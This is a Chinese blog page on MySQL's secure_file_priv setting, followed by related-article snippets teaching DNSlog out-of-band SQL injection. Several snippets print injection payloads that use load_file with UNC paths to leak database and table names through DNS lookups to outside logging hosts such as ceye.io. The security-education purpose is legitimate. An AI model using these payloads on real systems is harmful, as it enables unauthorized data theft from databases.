dnslog注入load_file不能解析UNC

优化数据库安全:MySQL 5.0以上版本的secure_file_priv设置详解
最新推荐文章于 2024-10-06 18:09:49 发布
原创 最新推荐文章于 2024-10-06 18:09:49 发布 · 919 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql

本文介绍如何在MySQL 5.0及以上版本中检查并修改secure_file_priv变量,确保数据安全性,参考了eryoung2在博客园分享的设置方法。

对于数据库版本高于5.0-----------检查表information_schema.GLOBAL_VARIABLES

select * from information_schema.GLOBAL_VARIABLES where variable_name like '%secure%';

参考

 

下一步就是修改了

参考文章:mysql --secure_file_priv的设置 - eryoung2 - 博客园

sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 503
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
dnslogmysql在linux_DNSlog平台各种利用姿势(盲注)
weixin_30588427的博客
02-23 738
题记首先祝大家新年快乐,过年给我最大的感觉就是几家欢喜几家愁,我们国家总量看似光鲜,可是平均下来也不多,小老百姓更不容易了,一般没有文化的百姓除了创业就是打工就是中间商赚差价,真是生活不易,加油,一起建设新中国。DNSlog我以前是通过看推文了解过,后来零组上架了这么个功能,想着试试,后来发现零组的好像还用不了,还是用别的平台吧,这是可以利用它进行快速盲注的工具,看完大佬们的文章复现完受益良多,g...
2021-11-13加解密,二次,load_file&dnslog注入换地方写了
weixin_44532761的博客
11-17 8274
小迪v17
DNSLog注入
一期一会的博客
01-13 4869
DNSLog注入原理 在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。 首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请
17、注入篇--DNS注入MySQL
无他,惟手熟尔
04-10 1105
DNS注入 DNS注入也称DNS带外注入DNSLog注入 DNS ​ DNS(Domain Name System)域名系统,将域名与IP地址相互映射的一个分布式数据库 DNS注入核心是 将盲注变为显错注入 DNS-log ​ DNS服务器的解析记录 注入基础 1、load_file() 读取文件的函数 ​ 读取文件并返回文件内容为字符串 ​ 要使用此函数文件必须位于主服务器上,必须指定完整路径的文件,而且必须有file权限 ​ 该文件所有字节可读,但文件内容必须小于max_allower_packe
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 336
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
DNSlog注入原理
wanggonghanfei的博客
10-06 982
dnslog注入也相当于盲注的一种,但是比盲注效率高一点。在一定的情况下,如果我们想对一个网站使用布尔或时间盲注,手动注入会对WAF的绕过会非常有帮助,但是效率不高,因此我们往往会使用SQLmap等工具注入,但是这种工具对很多网站都有限制。这时候就该尝试DNSlog注入。这种注入方式,相较于布尔或时间盲注而言,好处在于可以一组一组进行测试,不用再一个一个字符进行逐以测试,比其他两个盲注效率要高,但是要求服务器的读写权限都要对MySQL开启,如果没有开启的话,是不能使用这种注入方式的。
DNSlog注入
7Riven's blog
12-31 1042
DNSlog注入产生 测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSlog注入应用场景 sql注入的盲注、无回显的命令执行、无回显的SSRF DNSlog注入原理 有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...
SQL注入DnsLog注入
qq_52310755的博客
03-22 2492
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL DNSlog注入详解
永远是少年
08-07 1499
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
问题一:Mysql load_file()文件读取失败问题
qq_46494827的博客
04-11 2341
配置:Windows+phpstudy+sqlilabs 问题:在用load_file()进行文件读取时,无法读出文件内容 解决方案:打开phpstudy,查看MySQL安装目录,在其目录下找到my.ini文件,在文件中添加以下内容: [mysqld] secure_file_priv=" " ----备注:无空格 保存 phpstudy重启MySQL服务,即可。 ...
DNSLog使用方法
热门推荐
weixin_37104668的博客
09-14 1万+
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 DNSLOG工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog
DNSlog注入姿势
qq_43681802的博客
02-08 962
DNSlog注入(mysql数据库sql注入姿势) 简介:本文记录sql注入中的注入姿势DNSlog注入原理及其构造payload过程 文章目录DNSlog注入(mysql数据库sql注入姿势)前言一、什么是DNS(域名系统)?二、DNSlog注入注入场景注入具备条件什么是UNC路径?1.注入原理2.注入过程总结 前言 DNSLOG注入不是一种新的sql注入方式,而是一种注入姿势。方便为我们进行sql注入提供方法 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是DNS(域名系统)? DN
DNSLOG 注入
qq_33441500的博客
10-21 817
DNSLOG 注入 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获...
渗透测试(四)DNS-log注入
Cobb_L
09-03 1277
DNS log注入 测试靶场(掌控安全学院靶场):https://hack.zkaq.cn/battle/target?id=10679db0fd3523e5 分析:挖掘到目标网站有注入点,可通过DNS-log注入,拿到想要的数据 明白DNS原理,知道域名解析时域名服务器会记录log,但在别人服务器上我们看不到该log,则找工具:dnslog.cn 或者 ceye.io 上去回显出我们想要的数据 以mysql为例,构造注入语句,以load_file()函数配合dns-log得到数据 mysql中loa
concat拼接的坑 mysql_DNSlog注入踩坑记录:
weixin_39963465的博客
12-28 341
我遇到了两个巨坑,加上http://ceye.io/,经常无法访问,记录一下心酸的踩坑历史。直接将两个巨坑放到最前面,提醒后人!! 1. sql盲注,后端数据库用的mysql数据库,说一下用dnslog回显只能用于windows系统,原理就是''代表Microsoft Windows通用命名约定(UNC)的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个...
巧用DNSlog实现无回显注入
weixin_30335575的博客
12-16 1193
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Serv...
dnslog 记录
K0reyoshi的博客
04-18 1366
http://127.0.0.1/inject.php?user=1'+and+if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='lol' limit 0,1),'.d63d7k.ceye.io\\ab'))),1,1)--+- http:...
DNSLOG注入常用语句
最新发布
03-31
### 关于DNSLOG注入的常用Payload 在SQL盲注场景下,DNSLog注入是一种常见的技术手段,它可以通过`load_file()`函数或其他方式触发DNS解析请求,并将目标数据发送至指定的DNSLog平台。以下是几种常用的DNSLog注入Payload示例: #### Payload 示例 1:基于 `load_file()` 通过调用MySQL中的`load_file()`函数加载远程文件路径的方式,可以构造如下Payload: ```sql ' UNION SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.example.com\\')) -- ``` 此语句的作用是尝试从当前数据库名称拼接成一个完整的UNC路径并触发DNS查询[^3]。 #### Payload 示例 2:基于字符串拼接 另一种常见方法是直接使用字符串拼接功能构建子域部分,从而向外部DNS服务器发起请求。例如,在支持字符串连接运算符的情况下可写为: ```sql ' AND (SELECT CASE WHEN (1=1) THEN CONCAT_WS('.',database(),'zone.dnslog.example') ELSE '' END) INTO OUTFILE '/tmp/test.txt' ``` #### Payload 示例 3:动态执行命令 如果环境允许执行存储过程或者动态SQL,则还可以进一步扩展复杂度较高的攻击载荷。下面是一个简单的例子展示如何创建临时表并通过其内容生成自定义域名请求: ```sql CREATE TEMPORARY TABLE temp_dns(id INT, data VARCHAR(255)); INSERT INTO temp_dns VALUES(1,(SELECT user())); SELECT CONCAT((SELECT data FROM temp_dns WHERE id=1),'.subdomain.ceye.io.') AS result; DROP TABLE IF EXISTS temp_dns; ``` 以上每种形式都依赖具体的应用程序逻辑以及后台所使用的DBMS特性而有所不同;实际应用过程中需根据实际情况调整语法结构以适配不同类型的漏洞特征[^4]。 ### 注意事项 - 使用上述任何一种payload之前,请确保已获得合法授权来进行此类测试活动。 - 测试完成后应及时清理产生的中间状态(如临时表格),以免影响正常业务运行。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值